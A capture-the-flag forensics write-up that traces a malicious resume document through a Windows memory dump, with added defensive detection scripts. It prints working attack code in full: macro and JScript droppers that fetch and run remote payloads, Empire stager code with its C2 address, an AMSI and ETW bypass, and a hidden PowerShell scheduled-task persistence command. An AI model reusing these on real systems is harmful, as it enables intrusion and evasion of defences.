Boogeyman 2
The Boogeyman is back. Are you still afraid of the Boogeyman?
CONTEXT
Challenge Link: TryHackMe - Boogeyman 2
I. Background
Maxine, a Human Resource Specialist working for Quick Logistics LLC, received an application from one of the open positions in the company. Unbeknownst to her, the attached resume was malicious and compromised her workstation.
From: "westaylor23@outlook.com" <westaylor23@outlook.com>
To: "maxine.beck@quicklogisticsorg.onmicrosoft.com"
Content-Type: application/msword; name="Resume_WesleyTaylor.doc"
II. Artifacts
1. Exfiltration
A Python 3 HTTP server was started on the THM machine:
ubuntu@tryhackme:~$ cd Desktop/Artefacts/
ubuntu@tryhackme:~/Desktop/Artefacts$ python3 -m http.server
Then the files were downloaded using a local browser:
2. Email Attachment
The email carries a .doc attachment, which was extracted from the base64 body and checked to be a complete OLE document:
$ cat Resume\ -\ Application\ for\ Junior\ IT\ Analyst\ Role.eml | grep -i -E '^[A-Z0-9+/=]{32,76}' | tr -d '\r\n' | base64 -d > Resume_WesleyTaylor.doc
$ file Resume_WesleyTaylor.doc
Resume_WesleyTaylor.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: tryhackme, Template: Normal, Last Saved By: tryhackme, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 05:00, Create Time/Date: Sun Aug 20 21:49:00 2023, Last Saved Time/Date: Sun Aug 20 22:24:00 2023, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
$ binwalk Resume_WesleyTaylor.doc
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
4865 0x1301 PNG image, 468 x 222, 8-bit/color RGBA, non-interlaced
4919 0x1337 TIFF image data, big-endian, offset of first image directory: 8
35138 0x8942 Zip archive data, at least v2.0 to extract, compressed size: 255, uncompressed size: 540, name: [Content_Types].xml
35442 0x8A72 Zip archive data, at least v2.0 to extract, compressed size: 192, uncompressed size: 310, name: _rels/.rels
35675 0x8B5B Zip archive data, at least v2.0 to extract, compressed size: 131, uncompressed size: 138, name: theme/theme/themeManager.xml
35864 0x8C18 Zip archive data, at least v2.0 to extract, compressed size: 1939, uncompressed size: 8393, name: theme/theme/theme1.xml
37855 0x93DF Zip archive data, at least v2.0 to extract, compressed size: 182, uncompressed size: 283, name: theme/theme/_rels/themeManager.xml.rels
38455 0x9637 End of Zip archive, footer length: 22
38477 0x964D XML document, version: "1.0"
$ md5sum Resume_WesleyTaylor.doc
52c4384a0b9e248b95804352ebec6c5b Resume_WesleyTaylor.doc
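The grep/base64 one-liner above works for a single-attachment message but breaks on multipart mail with several encoded bodies. The following is an added example (not part of the original writeup) that does the same extraction with Python's standard email parser, hashing every attachment and checking that a .doc really starts with the OLE2 magic. The embedded message is a constructed sample that mirrors the headers shown above; its attachment is a 32-byte placeholder, not the real document.

```python
import base64
import email
import hashlib
from email import policy

# OLE2 / Compound Document File magic, the container format of legacy .doc files
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

# Constructed sample message (hypothetical) mirroring the headers seen in the
# writeup; the attachment body is a 32-byte placeholder that only carries the
# OLE magic, not the real malicious document.
_FAKE_DOC = OLE_MAGIC + b"\x00" * 24
SAMPLE_EML = (
    b'From: "westaylor23@outlook.com" <westaylor23@outlook.com>\r\n'
    b'To: "maxine.beck@quicklogisticsorg.onmicrosoft.com"\r\n'
    b"Subject: Resume - Application for Junior IT Analyst Role\r\n"
    b"MIME-Version: 1.0\r\n"
    b'Content-Type: multipart/mixed; boundary="B0UNDARY"\r\n'
    b"\r\n"
    b"--B0UNDARY\r\n"
    b'Content-Type: text/plain; charset="utf-8"\r\n'
    b"\r\n"
    b"Please find my resume attached.\r\n"
    b"--B0UNDARY\r\n"
    b'Content-Type: application/msword; name="Resume_WesleyTaylor.doc"\r\n'
    b"Content-Transfer-Encoding: base64\r\n"
    b'Content-Disposition: attachment; filename="Resume_WesleyTaylor.doc"\r\n'
    b"\r\n"
    + base64.b64encode(_FAKE_DOC)
    + b"\r\n--B0UNDARY--\r\n"
)


def extract_attachments(raw_eml: bytes) -> list:
    """Return one record per MIME attachment: name, declared type, size,
    hashes, and whether the bytes actually start with the OLE magic.
    A .doc that does not is either truncated or not what its extension claims."""
    msg = email.message_from_bytes(raw_eml, policy=policy.default)
    records = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""   # transfer-decoded bytes
        records.append({
            "filename": part.get_filename(),
            "content_type": part.get_content_type(),
            "size": len(data),
            "md5": hashlib.md5(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest(),
            "is_ole": data.startswith(OLE_MAGIC),
        })
    return records


def save_attachments(raw_eml: bytes, out_dir: str) -> list:
    """Write each attachment to out_dir and return the written paths."""
    import os
    msg = email.message_from_bytes(raw_eml, policy=policy.default)
    paths = []
    for part in msg.iter_attachments():
        name = os.path.basename(part.get_filename() or "attachment.bin")
        path = os.path.join(out_dir, name)
        with open(path, "wb") as fh:
            fh.write(part.get_payload(decode=True) or b"")
        paths.append(path)
    return paths


if __name__ == "__main__":
    for rec in extract_attachments(SAMPLE_EML):
        print(rec)
```

On the real .eml the md5 field should come out as 52c4384a0b9e248b95804352ebec6c5b, matching the md5sum output above; the sample here hashes a placeholder, so only the structural fields are meaningful.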
3. Memory Dump
The compromised workstation seems to be running on Windows 10:
$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win10x64_18362
AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace ($THM/Boogeyman2/WKSTN-2961.raw)
PAE type : No PAE
DTB : 0x1aa000L
KDBG : 0xf802536405e0L
Number of Processors : 2
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0xfffff80252340000L
KPCR for CPU 1 : 0xffffa601e54c0000L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2023-08-21 14:14:28 UTC+0000
Image local date and time : 2023-08-21 15:14:28 +0100
And that particular endpoint is owned by maxine.beck:
$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw filescan | grep 'Resume_WesleyTaylor'
0xe58f86465740 \Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc 216
0xe58f878c1420 \Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc 216
ANALYSIS
I. MalDoc
The email attachment contains a macro (marked with the M flag in the stream list) named NewMacros:
$ python3 ./git/DidierStevensSuite/oledump.py ./CTF/THM/Boogeyman2/Resume_WesleyTaylor.doc
1: 114 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 7288 '1Table'
5: 28574 'Data'
6: 414 'Macros/PROJECT'
7: 71 'Macros/PROJECTwm'
8: M 2027 'Macros/VBA/NewMacros'
9: m 962 'Macros/VBA/ThisDocument'
10: 2787 'Macros/VBA/_VBA_PROJECT'
11: 2242 'Macros/VBA/__SRP_0'
12: 122 'Macros/VBA/__SRP_1'
13: 935 'Macros/VBA/__SRP_2'
14: 156 'Macros/VBA/__SRP_3'
15: 570 'Macros/VBA/dir'
16: 4096 'WordDocument'
Looking at what it does:
$ python3 ./git/DidierStevensSuite/oledump.py -s 8 --vbadecompress $THM/Boogeyman2/Resume_WesleyTaylor.doc
Once the document is opened, the macro downloads a file (update.png), saves it as update.js and executes it via wscript.exe:
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
spath = "C:\ProgramData\"
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png", False
xHttp.Send
With bStrm
.Type = 1
.Open
.write xHttp.responseBody
.savetofile spath & "\update.js", 2
End With
Set shell_object = CreateObject("WScript.Shell")
shell_object.Exec ("wscript.exe C:\ProgramData\update.js")
End Sub
Confirming the execution via the memory dump: the malicious process wscript.exe (PID 4260) was indeed spawned by Microsoft Word (PID 1124) and in turn spawned updater.exe (PID 6216):
$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 pstree | grep -C2 -i wscript
Volatility Foundation Volatility Framework 2.6.1
... 0xffffe58f87c8a080:OUTLOOK.EXE 1440 596 22 0 2023-08-21 14:09:04 UTC+0000
.... 0xffffe58f81150080:WINWORD.EXE 1124 1440 18 0 2023-08-21 14:12:31 UTC+0000
..... 0xffffe58f864ca0c0:wscript.exe 4260 1124 6 0 2023-08-21 14:12:47 UTC+0000
...... 0xffffe58f87ac0080:updater.exe 6216 4260 18 0 2023-08-21 14:12:48 UTC+0000
....... 0xffffe58f84bd1080:conhost.exe 4464 6216 5 0 2023-08-21 14:14:03 UTC+0000
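The parent/child relationship above (Office application, then a script host, then a dropped executable) is the detection point. As an added example, not part of the original writeup, the following parses Volatility 2 pstree lines and flags exactly those two transitions, printing the full ancestry for each hit. The sample input is the pstree output shown above; the process name sets are an assumption for illustration.

```python
import re

# Constructed sample: the pstree lines shown in the writeup (Volatility 2 format).
PSTREE_SAMPLE = """\
... 0xffffe58f87c8a080:OUTLOOK.EXE 1440 596 22 0 2023-08-21 14:09:04 UTC+0000
.... 0xffffe58f81150080:WINWORD.EXE 1124 1440 18 0 2023-08-21 14:12:31 UTC+0000
..... 0xffffe58f864ca0c0:wscript.exe 4260 1124 6 0 2023-08-21 14:12:47 UTC+0000
...... 0xffffe58f87ac0080:updater.exe 6216 4260 18 0 2023-08-21 14:12:48 UTC+0000
....... 0xffffe58f84bd1080:conhost.exe 4464 6216 5 0 2023-08-21 14:14:03 UTC+0000
"""

# "<dots> 0x<eprocess>:<name> <pid> <ppid> ..." as printed by pstree
LINE_RE = re.compile(
    r"^\.*\s*0x[0-9a-fA-F]+:(?P<name>\S+)\s+(?P<pid>\d+)\s+(?P<ppid>\d+)\b"
)

# Assumed sets for illustration; extend them to fit the environment.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
NOISE = {"conhost.exe"}   # console host is spawned by almost every console process


def parse_pstree(text: str) -> dict:
    """Map pid -> (lowercased image name, ppid)."""
    procs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            procs[int(m.group("pid"))] = (m.group("name").lower(), int(m.group("ppid")))
    return procs


def ancestry(procs: dict, pid: int) -> str:
    """Walk parents until one is missing from the dump (or a loop is seen)."""
    names, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        name, ppid = procs[pid]
        names.append(name)
        pid = ppid
    return " -> ".join(reversed(names))


def find_suspicious_chains(procs: dict) -> list:
    """Return (pid, rule, ancestry) for each process matching one of two rules:
    an Office application spawning a script host, or a script host spawning
    something that is neither another script host nor console noise."""
    findings = []
    for pid, (name, ppid) in procs.items():
        parent = procs.get(ppid, ("<unknown>", None))[0]
        if parent in OFFICE_APPS and name in SCRIPT_HOSTS:
            findings.append((pid, "office-app-spawned-script-host", ancestry(procs, pid)))
        elif parent in SCRIPT_HOSTS and name not in SCRIPT_HOSTS | NOISE:
            findings.append((pid, "script-host-spawned-executable", ancestry(procs, pid)))
    return findings


if __name__ == "__main__":
    for pid, rule, chain in find_suspicious_chains(parse_pstree(PSTREE_SAMPLE)):
        print(f"[{rule}] pid={pid}: {chain}")
```

The same two rules map directly onto endpoint telemetry (Sysmon Event ID 1 or EDR process-creation events), where ParentImage/Image carry the same information as the pstree columns.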
II. C2 Callback
To figure out the origin of updater.exe, the initially downloaded file (update.png) was extracted from the memory dump:
$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw filescan | grep 'update'
0xe58f836edc60 \Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\IE\GEX3PLZ6\update[1].png 216
0xe58f8928f8b0 \Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\IE\FMJK14EZ\update[1].exe 216
0xe58f89291e30 \Windows\Tasks\updater.exe 216
0xe58f89293730 \Windows\Tasks\updater.exe 216
$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw -o $THM/Boogeyman2/volatility/ windows.dumpfiles --virtaddr 0xe58f836edc60
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe58f836edc60 update[1].png file.0xe58f836edc60.0xe58f87ddb320.DataSectionObject.update[1].png.dat
The extracted script shows that a file (update.exe) is downloaded, saved as updater.exe and then executed as is:
var Object = WScript.CreateObject('MSXML2.XMLHTTP');
var wshell = new ActiveXObject("WScript.Shell");
var location = "C:\\Windows\\Tasks\\";
var filename = "updater.exe";
var url = "https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.exe"
Object.Open('GET', url, false);
Object.Send();
if (Object.Status == 200)
{
var Stream = WScript.CreateObject('ADODB.Stream');
Stream.Open();
Stream.Type = 1; // Stream type 1 to set binary stream
Stream.Write(Object.ResponseBody);
Stream.Position = 0;
Stream.SaveToFile(location + filename, 2); // option 2 to force overwrite
Stream.Close();
}
wshell.Run("cmd.exe /c reg.exe add \"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\" /v C:\\Windows\\Tasks /f");
wshell.Run(location + filename);
WScript.Sleep(5*60*1000);
To find out what updater.exe is, it was extracted from the memory dump and decompiled using dnSpy:
$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 procdump -D $THM/Boogeyman2/volatility -p 6216
Volatility Foundation Volatility Framework 2.6.1
Process(V) ImageBase Name Result
------------------ ------------------ -------------------- ------
0xffffe58f87ac0080 0x0000000000c20000 updater.exe OK: executable.6216.exe
$ file executable.6216.exe
executable.6216.exe: PE32+ executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 2 sections
It is an Empire stager compiled via Sharpire:
// Sharpire.EmpireStager
// Token: 0x06000010 RID: 16 RVA: 0x00002578 File Offset: 0x00000778
public EmpireStager(SessionInfo sessionInfo1)
{
this.sessionInfo = sessionInfo1;
this.stagingKeyBytes = Encoding.ASCII.GetBytes(this.sessionInfo.GetStagingKey());
Random random = new Random();
char[] array = "ABCDEFGHKLMNPRSTUVWXYZ123456789".ToCharArray();
StringBuilder stringBuilder = new StringBuilder(8);
for (int i = 0; i < 8; i++)
{
int num = random.Next(array.Length);
stringBuilder.Append(array[num]);
}
this.sessionInfo.SetAgentID(stringBuilder.ToString());
CspParameters cspParameters = new CspParameters();
cspParameters.Flags |= CspProviderFlags.UseMachineKeyStore;
this.rsaCrypto = new RSACryptoServiceProvider(2048, cspParameters);
}
And it calls back to 128.199.95.189:8080:
using System;
using Sharpire;
// Token: 0x02000002 RID: 2
public static class Program
{
// Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
public static void Main()
{
try
{
string text = "http://128.199.95.189:8080";
string text2 = "xF}DlXKtjZ9/zaS2>smYiUC+;-yLqQOp";
string workingHours = "";
uint defaultDelay = 5U;
double defaultJitter = 0.0;
uint defaultLostLimit = 60U;
string text3 = "dotnet";
SessionInfo sessionInfo = new SessionInfo(new string[]
{
text,
text2,
text3
});
sessionInfo.SetWorkingHours(workingHours);
sessionInfo.SetDefaultJitter(defaultJitter);
sessionInfo.SetDefaultDelay(defaultDelay);
sessionInfo.SetDefaultLostLimit(defaultLostLimit);
new EmpireStager(sessionInfo).Execute();
}
catch (Exception ex)
{
Console.WriteLine(string.Concat(new string[]
{
ex.GetType().FullName,
": ",
ex.Message,
Environment.NewLine,
ex.StackTrace
}));
}
}
}
Confirming this in the memory dump: there was a connection to that address, but it is marked as CLOSED while the process is still running, meaning the agent might currently be inactive:
$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 netscan | grep -C2 updater.exe
Volatility Foundation Volatility Framework 2.6.1
WARNING : volatility.debug : Cannot find nt!ObGetObjectType
0xe58f86b73010 TCPv4 10.10.49.181:63308 128.199.95.189:8080 CLOSED -1 3884-06-06 01:06:33 UTC+0000
0xe58f87604010 TCPv4 10.10.49.181:63218 20.42.65.88:443 CLOSED -1 3884-06-06 01:06:31 UTC+0000
0xe58f8797fc40 UDPv4 0.0.0.0:0 *:* 6216 updater.exe 2023-08-21 14:12:48 UTC+0000
0xe58f87980570 UDPv4 0.0.0.0:0 *:* 6216 updater.exe 2023-08-21 14:12:48 UTC+0000
0xe58f87980570 UDPv6 :::0 *:* 6216 updater.exe 2023-08-21 14:12:48 UTC+0000
III. Persistence
The process memory of updater.exe was extracted from the dump to see whether command executions could be discovered:
$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 memdump -p 6216 -D $THM/Boogeyman2/volatility
Volatility Foundation Volatility Framework 2.6.1
************************************************************************
Writing updater.exe [ 6216] to 6216.dmp
It can be seen that an attempt was made to create a scheduled task named Updater:
$ strings -el 6216.dmp | grep -i "powershell.exe "
"C:\Windows\system32\schtasks.exe" /Create /F /SC DAILY /ST 09:00 /TN Updater /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\""
"C:\Windows\system32\schtasks.exe" /Create /F /SC DAILY /ST 09:00 /TN Updater /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\""
Confirming if the scheduled task was created, the task file was extracted from the memory dump:
$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw filescan | grep -i 'System32\\Tasks\\'
0xe58f86b42440 \Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask 216
0xe58f89295990 \Windows\System32\Tasks\Updater 216
$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw -o $THM/Boogeyman2/volatility/ windows.dumpfiles --virtaddr 0xe58f89295990
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe58f89295990 Updater file.0xe58f89295990.0xe58f838dcbe0.DataSectionObject.Updater.dat
The following is the XML configuration of the scheduled task indicating its successful creation:
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Date>2023-08-21T15:14:03</Date>
<Author>QUICKLOGISTICS\maxine.beck</Author>
<URI>\Updater</URI>
</RegistrationInfo>
<Triggers>
<CalendarTrigger>
<StartBoundary>2023-08-21T09:00:00</StartBoundary>
<Enabled>true</Enabled>
<ScheduleByDay>
<DaysInterval>1</DaysInterval>
</ScheduleByDay>
</CalendarTrigger>
</Triggers>
<Settings>
<!-- omitted -->
</Settings>
<Actions Context="Author">
<Exec>
<Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
<Arguments>-NonI -W hidden -c "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))"</Arguments>
</Exec>
</Actions>
<Principals>
<Principal id="Author">
<UserId>QUICKLOGISTICS\maxine.beck</UserId>
<LogonType>InteractiveToken</LogonType>
<RunLevel>LeastPrivilege</RunLevel>
</Principal>
</Principals>
</Task>
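Dumped task files like the one above are small enough to triage in bulk. As an added example, not part of the original writeup, the following reads a Task Scheduler XML file (UTF-16 with BOM, as Windows writes them), pulls out the registration, trigger, action and principal fields, and flags the argument patterns seen here (IEX, hidden window, base64 decode, payload read from the registry). The sample input is the Updater task above, trimmed and re-encoded; the indicator names and regexes are an assumption for illustration.

```python
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed sample: the Updater task XML recovered in the writeup, trimmed and
# re-encoded as UTF-16 with BOM, the way Task Scheduler stores it on disk.
SAMPLE_TASK_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2023-08-21T15:14:03</Date>
    <Author>QUICKLOGISTICS\maxine.beck</Author>
    <URI>\Updater</URI>
  </RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2023-08-21T09:00:00</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
      <Arguments>-NonI -W hidden -c "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))"</Arguments>
    </Exec>
  </Actions>
  <Principals>
    <Principal id="Author">
      <UserId>QUICKLOGISTICS\maxine.beck</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
</Task>
""".encode("utf-16")

# Assumed indicator list for illustration: name -> pattern over the Exec arguments.
INDICATORS = [
    ("invoke-expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("hidden-window", re.compile(r"-W(?:indowStyle)?\s+hidden", re.I)),
    ("base64-decode", re.compile(r"FromBase64String|-e(?:nc|ncodedcommand)?\b", re.I)),
    ("registry-stored-payload", re.compile(r"\b(?:gp|Get-ItemProperty)\s+HK(?:CU|LM):", re.I)),
]
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe")


def load_task_xml(data: bytes) -> ET.Element:
    """Decode a task file (UTF-16 with BOM or UTF-8) and parse it."""
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        text = data.decode("utf-16")
    else:
        text = data.decode("utf-8")
    # The declaration names an encoding we have already undone; drop it.
    text = re.sub(r"^\s*<\?xml[^>]*\?>", "", text)
    return ET.fromstring(text)


def triage_task(data: bytes) -> dict:
    """Summarise a task and list the suspicious traits of its Exec action."""
    root = load_task_xml(data)

    def text(path: str) -> str:
        el = root.find(path, TASK_NS)
        return (el.text or "").strip() if el is not None else ""

    command = text("t:Actions/t:Exec/t:Command")
    arguments = text("t:Actions/t:Exec/t:Arguments")
    hits = [name for name, rx in INDICATORS if rx.search(arguments)]
    if command.lower().endswith(SCRIPT_HOSTS):
        hits.insert(0, "script-host-action")
    return {
        "uri": text("t:RegistrationInfo/t:URI"),
        "author": text("t:RegistrationInfo/t:Author"),
        "registered": text("t:RegistrationInfo/t:Date"),
        "run_as": text("t:Principals/t:Principal/t:UserId"),
        "start": text("t:Triggers/t:CalendarTrigger/t:StartBoundary"),
        "daily_interval": text("t:Triggers/t:CalendarTrigger/t:ScheduleByDay/t:DaysInterval"),
        "command": command,
        "arguments": arguments,
        "indicators": hits,
    }


if __name__ == "__main__":
    for key, value in triage_task(SAMPLE_TASK_XML).items():
        print(f"{key:15} {value}")
```

Run over every file under C:\Windows\System32\Tasks (or the dumped copies), a task whose indicator list is non-empty is worth a closer look; the registry-stored-payload hit is what ties this task to the NTUSER.DAT value examined next.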
The command run by the scheduled task executes a base64-encoded string stored in a registry value under HKEY_CURRENT_USER, meaning it should be visible in the compromised user maxine.beck's NTUSER.DAT file. Extracting that hive from the memory dump:
$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 hivelist
Volatility Foundation Volatility Framework 2.6.1
Virtual Physical Name
------------------ ------------------ ----
0xffff9582f2681000 0x000000000f08d000 \??\C:\Users\maxine.beck\ntuser.dat
0xffff9582f1ad4000 0x0000000013f84000 \??\C:\Users\maxine.beck\AppData\Local\Microsoft\Windows\UsrClass.dat
0xffff9582f326d000 0x000000001ed22000 \??\C:\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.StartMenuExperienceHost_10.0.18362.387_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat
0xffff9582eae0d000 0x00000000009ad000 [no name]
0xffff9582eae33000 0x00000000072ca000 \REGISTRY\MACHINE\SYSTEM
0xffff9582ee925000 0x0000000023098000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xffff9582eea98000 0x0000000020d34000 \SystemRoot\System32\Config\BBI
0xffff9582eead5000 0x00000000323b5000 \REGISTRY\USER\S-1-5-19
0xffff9582efe8e000 0x00000000054f7000 \REGISTRY\A\{c5dbb98f-ac23-f861-cb09-87c8bc73488b}
0xffff9582f11fc000 0x00000000301f8000 [no name]
0xffff9582f2b90000 0x00000000369ba000 [no name]
0xffff9582eb808000 0x000000001003a000 \REGISTRY\MACHINE\SOFTWARE
0xffff9582f050b000 0x00000000154b2000 \Device\HarddiskVolume1\Boot\BCD
0xffff9582f2c10000 0x0000000019aed000 \REGISTRY\A\{91B92570-4098-466B-9A97-B1F699128FD3}
0xffff9582eb805000 0x000000000ddc1000 \REGISTRY\USER\.DEFAULT
0xffff9582f26ac000 0x000000000662b000 \??\C:\Users\maxine.beck\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\settings.dat
$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 dumpregistry -D $THM/Boogeyman2/volatility -o 0xffff9582f2681000
Volatility Foundation Volatility Framework 2.6.1
**************************************************
Writing out registry: registry.0xffff9582f2681000.ntuserdat.reg
[..omitted..]
***********************************************
Then, looking for long base64 strings stored in it:
$ strings -el registry.0xffff9582f2681000.ntuserdat.reg | grep -i -E '[a-z0-9\+\/=]{100,}'
$ strings -el registry.0xffff9582f2681000.ntuserdat.reg | grep -i -E '[a-z0-9\+\/=]{100,}' | base64 -d
If($PSVersionTable.PSVersion.Major -ge 3){$Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$Ref.GetField('amsiInitFailed','NonPublic,Static').Setvalue($Null,$true);[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0);};[System.Net.ServicePointManager]::Expect100Continue=0;$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAxADIAOAAuADEAOQA5AC4AOQA1AC4AMQA4ADkAOgA4ADAAOAAwAA==')));$t='/news.php';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('xF}DlXKtjZ9/zaS2>smYiUC+;-yLqQOp');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Headers.Add("Cookie","hlFKsAOj=YbML71kRmKeA503M8Vjs8W8W4fY=");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX
It is another Empire stager which was set up for persistence:
If($PSVersionTable.PSVersion.Major -ge 3){
$Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');
$Ref.GetField('amsiInitFailed','NonPublic,Static').Setvalue($Null,$true);
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0);
};
[System.Net.ServicePointManager]::Expect100Continue=0;
$wc=New-Object System.Net.WebClient;
$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAxADIAOAAuADEAOQA5AC4AOQA1AC4AMQA4ADkAOgA4ADAAOAAwAA==')));
$t='/news.php';
$wc.Headers.Add('User-Agent',$u);
$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('xF}DlXKtjZ9/zaS2>smYiUC+;-yLqQOp');
$R={
$D,$K=$Args;
$S=0..255;0..255|%{
$J=($J+$S[$_]+$K[$_%$K.Count])%256;
$S[$_],$S[$J]=$S[$J],$S[$_]
};
$D|%{
$I=($I+1)%256;
$H=($H+$S[$I])%256;
